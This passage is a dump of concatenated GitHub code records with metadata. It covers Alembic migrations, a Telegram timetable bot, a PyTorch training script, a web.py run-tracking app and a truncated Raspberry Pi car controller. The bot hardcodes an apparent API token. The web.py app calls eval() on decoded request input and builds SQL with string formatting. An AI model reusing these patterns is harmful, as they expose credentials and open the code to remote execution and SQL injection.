= MangaReleases(\n\t\t\t\t\t\tstate = state_val,\n\t\t\t\t\t\terr_str = None,\n\t\t\t\t\t\tsource_site = sourcesite,\n\t\t\t\t\t\tseries_name = seriesname,\n\t\t\t\t\t\tsource_id = sourceurl,\n\t\t\t\t\t\tfirst_seen = dl_at if dl_at > posted_at else posted_at,\n\t\t\t\t\t\tposted_at = dl_at,\n\t\t\t\t\t\tdownloaded_at = posted_at,\n\t\t\t\t\t\tphash_duplicate = \"phash-duplicate\" in tags,\n\t\t\t\t\t\twas_duplicate = \"was-duplicate\" in tags,\n\t\t\t\t\t\tuploaded = \"uploaded\" in tags,\n\t\t\t\t\t\tdeleted = \"deleted\" in tags,\n\t\t\t\t\t\tdirstate = dirstate_val,\n\t\t\t\t\t\torigin_name = originname,\n\t\t\t\t\t\tadditional_metadata = additional_metadata,\n\t\t\t\t\t\tfileid = file.id if file else None,\n\t\t\t\t\t)\n\t\t\t\tsess.add(row)\n\t\t\t\tmigrate_manga_tags(row, flags, tags)\n\n\t\t\t\tnew += 1\n\t\t\t\tif new > 1000:\n\t\t\t\t\tnew = 0\n\t\t\t\t\tprint(\"\\nCommitting %s!\\n\" % mode)\n\n\t\t\t\t\tsess.flush()\n\t\t\t\t\tsess.commit()\n\t\t\t\t\tbind.execute(\"\"\"COMMIT\"\"\")\n\n\t\ttry:\n\t\t\tgo_manga()\n\t\t\tprint(\"Migration of %s complete!\" % mode)\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\tprint(\"Thread had exception\")\n\t\t\ttraceback.print_exc()\n\t\t\treturn False\n\t\t\traise e\n\n\twith concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n\t\tres = []\n\t\tres.append(executor.submit(go, 'manga'))\n\n\t\tif not all([tmp.result() for tmp in res]):\n\n\t\t\traise RuntimeError(\"Failure in migration!\")\n\n\t# ### end Alembic commands ###\n\ndef downgrade():\n\t# ### commands auto generated by Alembic - please adjust! 
###\n\tpass\n\t# ### end Alembic commands ###\n", "repo_name": "herp-a-derp/MangaCMS", "sub_path": "alembic/versions/92b545554cb2_.py", "file_name": "92b545554cb2_.py", "file_ext": "py", "file_size_in_byte": 12857, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlalchemy.dialects.postgresql.base.ischema_names", "line_number": 34, "usage_type": "name"}, {"api_name": "citext.CIText", "line_number": 34, "usage_type": "attribute"}, {"api_name": "sqlalchemy.dialects.postgresql.base.ischema_names", "line_number": 55, "usage_type": "name"}, {"api_name": "citext.CIText", "line_number": 55, "usage_type": "attribute"}, {"api_name": "sqlalchemy.dialects.postgresql.ENUM", "line_number": 86, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.ENUM", "line_number": 87, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.ENUM", "line_number": 88, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 96, "usage_type": "attribute"}, {"api_name": "alembic.op.get_bind", "line_number": 100, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 100, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.session.Session", "line_number": 101, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 109, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 113, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 115, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 115, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 115, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 116, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 116, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 116, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 117, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 119, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 121, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 121, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 121, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 122, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 122, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 122, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 123, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 128, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 128, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 129, "usage_type": "call"}, {"api_name": "citext.CIText", "line_number": 129, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.UniqueConstraint", "line_number": 132, "usage_type": "call"}, {"api_name": "cachetools.cached", "line_number": 136, "usage_type": "call"}, {"api_name": "cachetools.TTLCache", "line_number": 136, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 157, "usage_type": "call"}, {"api_name": "sqlalchemy.BigInteger", "line_number": 157, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 158, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 159, 
"usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 159, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 161, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 161, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 162, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 162, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 164, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 164, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 165, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 165, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 165, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 166, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 166, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 166, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 167, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 167, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 167, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 169, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 169, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 170, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 170, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 171, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 171, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 172, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 172, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 174, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 176, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 176, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 177, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 177, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 179, "usage_type": "call"}, {"api_name": "sqlalchemy_jsonfield.JSONField", "line_number": 179, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 181, "usage_type": "call"}, {"api_name": "sqlalchemy.BigInteger", "line_number": 181, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 181, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 182, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 184, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.backref", "line_number": 186, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.associationproxy.association_proxy", "line_number": 188, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.UniqueConstraint", "line_number": 191, "usage_type": "call"}, {"api_name": "sqlalchemy.Index", "line_number": 192, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 200, "usage_type": "call"}, {"api_name": "sqlalchemy.BigInteger", "line_number": 200, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 202, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", 
"line_number": 202, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 203, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 203, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 204, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 204, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 205, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 207, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 207, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 209, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 209, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 209, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 211, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.backref", "line_number": 213, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.associationproxy.association_proxy", "line_number": 215, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.UniqueConstraint", "line_number": 220, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.UniqueConstraint", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 228, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 229, "usage_type": "name"}, {"api_name": "os.path.path.isdir", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 231, "usage_type": "name"}, {"api_name": "hashlib.md5", "line_number": 244, "usage_type": "call"}, {"api_name": "MangaCMSOld.lib.dbPool.lib.dbPool.pool.getconn", "line_number": 312, "usage_type": "call"}, {"api_name": "MangaCMSOld.lib.dbPool.lib", "line_number": 312, "usage_type": "attribute"}, {"api_name": "MangaCMSOld.lib.dbPool", "line_number": 312, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 329, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.joinedload", "line_number": 337, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 367, "usage_type": "call"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 374, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 374, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 375, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 375, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 413, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 417, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 417, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 417, "usage_type": "name"}]}
+{"seq_id": "37403729837", "text": "import telebot\n\nAPI_TOKEN = '2144331292:AAG2F3nOufD70TVURRzHuTrJ3fNytutb6eI'\nbot = telebot.TeleBot(API_TOKEN)\n\n\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message):\n if message.text == '/start':\n bot.reply_to(message, \"\"\"\\\n Hi there, I am TimeBot.\n \nCodebuild Here!\n\nI am here to help you don't forgot your timetable of classes!\\\n \"\"\")\n else:\n bot.reply_to(message, \"\"\"\\\n Hi there, I am TimeBot.\nI know the schedule for 5 days (Monday, Tuesday, Wednesday, Thursday, Friday)!\n \"\"\")\n \n\n\nfile = open(\"text.txt\" , 'r')\ntemp = file.read()\ntimetable = temp.split(\"\\n\\n\")\n\n@bot.message_handler(content_types=['text'])\ndef send_text(message):\n if message.text.lower() == 'monday':\n bot.send_message(message.chat.id, timetable[0])\n if message.text.lower() == 'tuesday':\n bot.send_message(message.chat.id, timetable[1])\n if message.text.lower() == 'wednesday':\n bot.send_message(message.chat.id, timetable[2])\n if message.text.lower() == 'thursday':\n bot.send_message(message.chat.id, timetable[3])\n if message.text.lower() == 'friday':\n bot.send_message(message.chat.id, timetable[4])\n\nbot.infinity_polling()", "repo_name": "ignat24/Final-Demo", "sub_path": "app/bot/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1210, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "telebot.TeleBot", "line_number": 4, "usage_type": "call"}]}
+{"seq_id": "16719356728", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 22 19:21:08 2021\n\n@author: mateusz\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom torchvision import transforms\n\n\nfrom torch.utils.data import DataLoader\n\nfrom dataloader.FacialDetection import FacialDetectionDataset, my_collate\nfrom networks.fcn import FCN2D, Pooled_FCN2D\nfrom utils.image_processing import convert_tensor_to_im\n\n#%% Find GPU\ncuda = True if torch.cuda.is_available() else False\ndevice = torch.device('cuda') if cuda else torch.device('cpu')\n\n#%% Hyperparameters\nBATCH_SIZE_TRAIN = 32\nBATCH_SIZE_VAL = 5\nEPOCHS = 100\nCALLBACK_FREQ = 5\n\n#%% Dataloader\n\ntransform_func = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5])])\n\ndata = FacialDetectionDataset('data/training.csv',\n transform=transform_func,\n target_transform=transform_func)\n\ntrain_data, val_data = torch.utils.data.random_split(data, \n [len(data)-20, 20])\n\ntrain_loader = DataLoader(dataset=train_data, \n batch_size=BATCH_SIZE_TRAIN, \n shuffle=True, \n num_workers=0)\n\nval_loader = DataLoader(dataset=val_data, \n batch_size=BATCH_SIZE_VAL, \n shuffle=True, \n num_workers=0)\n\n#%% Preparation for training\nnet = Pooled_FCN2D().to(device)\n\ncriterion = nn.MSELoss().to(device)\noptim = torch.optim.Adam(net.parameters(), lr=0.0002, \n betas=(0.5, 0.999))\nlosses_train = []\nlosses_val = []\n\nfor epoch in range(EPOCHS):\n net.train()\n for ii, (im, label) in enumerate(train_loader):\n optim.zero_grad()\n output = net(im.to(device))\n loss_train = criterion(output, label.to(device))\n loss_train.backward()\n optim.step()\n\n if epoch % CALLBACK_FREQ == 0:\n net.eval()\n val_im, val_label = next(iter(val_loader)) \n output = net(val_im.to(device))\n \n loss_val = criterion(output, val_label.to(device))\n losses_val.append(loss_val.item())\n\n plt.figure(figsize=(5, 5))\n readable_output = np.sum(output[0].detach().cpu().numpy(),axis=0,\n keepdims=True)\n fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20, 10))\n ax1.imshow(convert_tensor_to_im(val_im[0]))\n ax2.imshow(convert_tensor_to_im(val_label[0], reduce_channel_dim=True))\n ax3.imshow(convert_tensor_to_im(output[0], reduce_channel_dim=True))\n plt.show()\n\n losses_train.append(loss_train.item())\n \ntorch.save(net.state_dict(), 'model.pth')\ntorch.save(optim.state_dict(), 'optimizer.pth')\n\n\n\n\n\n\n", "repo_name": "MateuszFlo/PhotoRoom", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.cuda.is_available", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "dataloader.FacialDetection.FacialDetectionDataset", "line_number": 37, "usage_type": "call"}, {"api_name": 
"torch.utils.data.random_split", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 49, "usage_type": "call"}, {"api_name": "networks.fcn.Pooled_FCN2D", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 58, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "utils.image_processing.convert_tensor_to_im", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.image_processing.convert_tensor_to_im", "line_number": 85, "usage_type": "call"}, {"api_name": "utils.image_processing.convert_tensor_to_im", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "1970920636", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom urllib.request import urlopen\nimport json\nfrom pprint import pprint\nimport web\nimport pymysql\nimport time\nimport base64\nimport config as c\nfrom qiniu import Auth, put_file, etag, urlsafe_base64_encode\nimport qiniu.config\nrender = web.template.render('templates/')\nurls= (\n '/hello(.*)','hello',\n '/test(.*)','test',\n '/refer(.*)', 'refer',\n '/refer(.*)', 'refer',\n '/user(.*)','user',\n '/(.*)','index',\n )\n\n\n\napp= web.application(urls,globals())\n\n\ndef conSQL():\n conn = pymysql.connect(host='localhost', user=c.mysql_user, passwd=c.mysql_pass, db='db_run', port=3306, charset='utf8')\n\n return conn\n\n\nclass index:\n def GET(self,name):\n print('haha')\n\nclass user:\n def GET(self, name):\n conn = conSQL()\n cur = conn.cursor() # 获取一个游标\n cur.execute('SELECT u.id,u.nickname,u.realname,u.money,sum(r.length) length ,COUNT(r.id) cou FROM (\\\n SELECT u.id,u.nickname,u.realname,sum(m.money) money \\\n FROM `User` u, Money m WHERE u.id = m.user_id GROUP BY u.id) \\\n u,Run r WHERE u.id = r.user_id GROUP BY u.id')\n data = cur.fetchall()\n #print(data)\n return render.user(data)\n\n#跑步数据写入数据库\ndef SQL_refer(data):\n #print(data['hour'])\n time = int(data['hour'])*60*60 + int(data['minute'])*60 + int(data['second'])\n print(time)\n conn = conSQL()\n cur = conn.cursor() # 获取一个游标\n cur.execute(\"INSERT INTO `Run` (`id`, `user_id`, `time`, `length`, `img`, `date`) \\\n VALUES (NULL,'%d','%d','%f','%s','%d')\" \\\n %(int(data['user_id']),time,float(data['lenth']),data['key'],int(data['date'])))\n conn.commit()\n print(time)\n #int(data['user_id']),time,float(data['lenth']),data['key'],int(data['date'])\n\n\nclass refer:\n\n def GET(self,name):\n try:\n i = web.input()\n data = base64.b64decode(i.upload_ret).decode('ascii')\n data = eval(data)\n print(data)\n SQL_refer(data)\n except:\n print('11')\n\n # 需要填写你的 Access Key 和 Secret Key\n access_key = c.access_key\n secret_key = c.secret_key\n # 构建鉴权对象\n q = Auth(access_key, secret_key)\n # 要上传的空间\n bucket_name = c.bucket_name\n # 上传到七牛后保存的文件名\n date = int(time.time())\n key = str(int(time.time())) + '.png';\n # 生成上传 Token,可以指定过期时间等\n token = q.upload_token(bucket_name, key, 3600, {'returnUrl':'http://127.0.0.1:8080/refer', 'returnBody': '{\"user_id\": $(x:user_id),\"hour\": $(x:hour),\"minute\": $(x:minute),\"second\": $(x:second), \"key\": $(key),\"lenth\":$(x:lenth),\"date\":$(x:date)}'})\n return render.refer(key,token,date)\n\n def POST(self, name):\n\n print('111')\n #return render.refer()\nclass test:\n def GET(self, name):\n\n return render.test()\nif __name__== \"__main__\":\n app.run()", "repo_name": "david10088/wnt_run_python", "sub_path": "index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 3075, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "web.template.render", "line_number": 14, "usage_type": "call"}, {"api_name": "web.template", "line_number": 14, "usage_type": "attribute"}, {"api_name": "web.application", "line_number": 26, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 30, "usage_type": "call"}, {"api_name": "config.mysql_user", "line_number": 30, "usage_type": "attribute"}, {"api_name": "config.mysql_pass", "line_number": 30, "usage_type": "attribute"}, {"api_name": "web.input", "line_number": 70, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 71, "usage_type": "call"}, 
{"api_name": "config.access_key", "line_number": 79, "usage_type": "attribute"}, {"api_name": "config.secret_key", "line_number": 80, "usage_type": "attribute"}, {"api_name": "qiniu.Auth", "line_number": 82, "usage_type": "call"}, {"api_name": "config.bucket_name", "line_number": 84, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "time.time", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "73341814807", "text": "\"\"\"Make equipment types global\n\nRevision ID: 27c45c384d65\nRevises: 0117bd0fa784\nCreate Date: 2018-10-24 14:24:46.437709\n\"\"\"\n\nimport sqlalchemy as sa\nfrom alembic import context, op\n\n\n# revision identifiers, used by Alembic.\nrevision = '27c45c384d65'\ndown_revision = '0117bd0fa784'\nbranch_labels = None\ndepends_on = None\n\n\ndef _make_names_unique():\n conn = op.get_bind()\n default_location_id = conn.execute('SELECT id FROM roombooking.locations WHERE is_default').scalar()\n if default_location_id is None:\n has_dupes = conn.execute('SELECT COUNT(DISTINCT name) != COUNT(name) FROM roombooking.equipment_types').scalar()\n if has_dupes:\n raise Exception('Please set a default location or remove equipment types whose names are not unique '\n 'across locations')\n return\n res = conn.execute('''\n SELECT eq.id, eq.name, loc.name AS location\n FROM roombooking.equipment_types eq\n JOIN roombooking.locations loc ON (loc.id = eq.location_id)\n WHERE eq.location_id != %s\n ''', (default_location_id,))\n for row in res:\n conflict = conn.execute('SELECT COUNT(*) FROM roombooking.equipment_types WHERE id != %s AND name = %s',\n (row.id, row.name)).scalar()\n if conflict:\n new_name = f'{row.name} ({row.location})'\n conn.execute('UPDATE roombooking.equipment_types SET name = %s WHERE id = %s', (new_name, row.id))\n\n\ndef upgrade():\n if context.is_offline_mode():\n raise Exception('This upgrade is only possible in online mode')\n _make_names_unique()\n op.drop_index('ix_equipment_types_name', table_name='equipment_types', schema='roombooking')\n op.drop_constraint('uq_equipment_types_name_location_id', 'equipment_types', schema='roombooking')\n op.create_index(None, 'equipment_types', ['name'], unique=True, schema='roombooking')\n op.drop_column('equipment_types', 'location_id', schema='roombooking')\n\n\ndef downgrade():\n if context.is_offline_mode():\n raise Exception('This downgrade is only possible in online mode')\n conn = op.get_bind()\n default_location_id = conn.execute('SELECT id FROM roombooking.locations WHERE is_default').scalar()\n if default_location_id is None:\n if conn.execute('SELECT COUNT(*) FROM roombooking.locations').scalar():\n raise Exception('Please set a default location')\n default_location = str(default_location_id) if default_location_id is not None else None\n op.add_column('equipment_types', sa.Column('location_id', sa.Integer(), nullable=False,\n server_default=default_location),\n schema='roombooking')\n op.alter_column('equipment_types', 'location_id', server_default=None, schema='roombooking')\n op.create_foreign_key(None, 'equipment_types', 'locations', ['location_id'], ['id'],\n source_schema='roombooking', referent_schema='roombooking')\n op.drop_index('ix_uq_equipment_types_name', table_name='equipment_types', schema='roombooking')\n op.create_unique_constraint(None, 'equipment_types', ['name', 'location_id'], schema='roombooking')\n op.create_index(None, 'equipment_types', ['name'], schema='roombooking')\n", "repo_name": "indico/indico", "sub_path": "indico/migrations/versions/20181024_1424_27c45c384d65_make_equipment_types_global.py", "file_name": "20181024_1424_27c45c384d65_make_equipment_types_global.py", "file_ext": "py", "file_size_in_byte": 3279, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1560, "dataset": "github-code", "pt": "31", "api": [{"api_name": "alembic.op.get_bind", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 20, 
"usage_type": "name"}, {"api_name": "alembic.context.is_offline_mode", "line_number": 43, "usage_type": "call"}, {"api_name": "alembic.context", "line_number": 43, "usage_type": "name"}, {"api_name": "alembic.op.drop_index", "line_number": 46, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 46, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 47, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 47, "usage_type": "name"}, {"api_name": "alembic.op.create_index", "line_number": 48, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 48, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 49, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 49, "usage_type": "name"}, {"api_name": "alembic.context.is_offline_mode", "line_number": 53, "usage_type": "call"}, {"api_name": "alembic.context", "line_number": 53, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 55, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 55, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 61, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 61, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 61, "usage_type": "call"}, {"api_name": "alembic.op.alter_column", "line_number": 64, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 64, "usage_type": "name"}, {"api_name": "alembic.op.create_foreign_key", "line_number": 65, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 65, "usage_type": "name"}, {"api_name": "alembic.op.drop_index", "line_number": 67, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 67, "usage_type": "name"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 68, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 68, "usage_type": "name"}, {"api_name": "alembic.op.create_index", "line_number": 69, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 69, "usage_type": "name"}]}
+{"seq_id": "16571600411", "text": "import RPi.GPIO as GPIO\nimport time\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\n\n\"\"\"\n * |==================================================|\n * |======This code created by K.J. Chen(陳冠儒)======|\n * |=Copyright © 2019 K.J. Chen | All Rights Reserved=|\n * |==================================================|\n\"\"\"\n\n\nclass CarRun:\n def __init__(self, dt = 3):\n self.dt = dt # Delaytime\n global IN\n IN = [20, 21, 19, 26]\n global EN_A\n EN_A = 16\n global EN_B\n EN_B = 13\n \"\"\"\n global key\n key = 8\n \"\"\"\n global AvoidSensorLeft\n AvoidSensorLeft = 12\n global AvoidSensorRight\n AvoidSensorRight = 17\n\n #def __new__(self, dt = 1):\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n\n # def __call__(self):\n # return redirect(\"javascript:window.close();\")\n # #return HttpResponse(' ')\n\n def motor_init(self):\n global pwm_EN_A\n global pwm_EN_B\n\n for i in range(4):\n GPIO.setup(IN[i], GPIO.OUT, initial = 0)\n\n GPIO.setup(EN_A, GPIO.OUT, initial = 1)\n pwm_EN_A = GPIO.PWM(EN_A, 2000)\n pwm_EN_A.start(0)\n\n GPIO.setup(EN_B, GPIO.OUT, initial = 1)\n pwm_EN_B = GPIO.PWM(EN_B, 2000)\n pwm_EN_B.start(0)\n\n #GPIO.setup(key,GPIO.IN)\n GPIO.setup(AvoidSensorLeft,GPIO.IN)\n GPIO.setup(AvoidSensorRight,GPIO.IN)\n\n @staticmethod\n def brake(dt = 1):\n for i in range(4):\n GPIO.output(IN[i], 0)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(dt)\n\n # Go Advance\n def advance(self, request, b_k = 0):\n dt = self.dt\n for i in range(4):\n t = i%2 == 0\n #t = 1\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Go Advance\")\n #self.request = request\n\n # Go Back\n def back(self, request, b_k = 0):\n for i in range(4):\n t = i%2 == 1\n # t = 0\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Go 